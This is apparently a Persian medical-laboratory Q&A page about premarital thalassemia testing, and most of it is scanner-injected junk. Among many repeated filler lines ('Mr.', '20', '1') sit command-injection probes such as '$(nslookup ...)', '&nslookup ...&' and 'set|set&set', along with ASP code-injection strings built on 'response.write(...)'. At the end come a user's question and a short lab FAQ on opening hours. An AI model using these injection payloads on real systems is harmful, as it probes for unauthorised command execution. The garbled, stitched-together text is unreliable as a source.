1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
&nslookup gAf3cFik&'\"`0&nslookup gAf3cFik&`'
20
1
$(nslookup zjB5R1Lw)
20
1
Mr.
20
1
set|set&set
20
1
wAzbPvyN
20
1
Mr.
20
1
Mr.
20
IMeE3l1o
Mr.
20
1
Mr.
20
1
Mr.
Gy9eyG88
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
&nslookup z3IFwaNz&'\"`0&nslookup z3IFwaNz&`'
Mr.
20
1
Mr.
20
$(nslookup h2vDkret)
Mr.
20
1
Mr.
20
1
"+response.write(9458332*9626702)+"
20
1
'+response.write(9458332*9626702)+'
20
1
response.write(9458332*9626702)
20
1
Mr.
20
1
Mr.
20
set|set&set
Mr.
20
1
Mr.
&nslookup ArToj6sI&'\"`0&nslookup ArToj6sI&`'
1
Mr.
$(nslookup kaAVjU29)
1
Mr.
20
"+response.write(9405510*9406938)+"
Mr.
20
'+response.write(9405510*9406938)+'
Mr.
20
1
Mr.
set|set&set
response.write(9405510*9406938)
Mr.
20
1
Mr.
20
1
Mr.
"+response.write(9480200*9628113)+"
1
Mr.
20
1
Mr.
'+response.write(9480200*9628113)+'
1
Mr.
response.write(9480200*9628113)
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
سحر
ازمايش تست تالاسمي براي ازدواج
تست تالاسمي ازدواج انجام ميشه؟و هزينه اش چقدر ميشه و جوابش چند روز اماده ميشه؟


نام کاربر:        موضوع:        تلفن همراه:

پیام:
           
سوالات متداول

 ساعات کاری آزمایشگاه به چه صورت می باشد؟
آزمایشگاه دکتر خرمی از شنبه تا پنج شنبه از ساعت 7 صبح تا 21:30 و روزهای جمعه و تعطیلات رسمی از ساعت 8 تا 13:30 دایر میباشد.

چرا باید آزمایش خود را مجددا تکرار کنم؟
گاهی به علت کیفیت پایین نمونه و یا جهت اطمینان از نتیجه آزمایش، نیاز به تکرار آزمایش می باشد.

آیا آزمایشهای پیش از ازدواج در آزمایشگاه دانش انجام می شود؟ بله. به غیر از آزمایش عدم اعتیاد که صرفا در مراکز دولتی قابل انجام است.